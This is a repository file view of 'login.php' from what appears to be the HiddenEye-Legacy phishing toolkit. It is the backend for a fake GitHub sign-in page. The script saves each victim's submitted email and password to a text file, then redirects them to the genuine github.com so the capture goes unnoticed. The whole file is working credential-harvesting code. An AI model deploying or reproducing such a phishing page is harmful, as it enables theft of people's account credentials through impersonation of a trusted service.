HiddenEye-Legacy/WebPages/GitHub/login.php
Usama Abdul Sattar c26526a7b8
Update login.php
2018-06-08 16:51:26 +05:00

7 lines
191 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://github.com');
exit();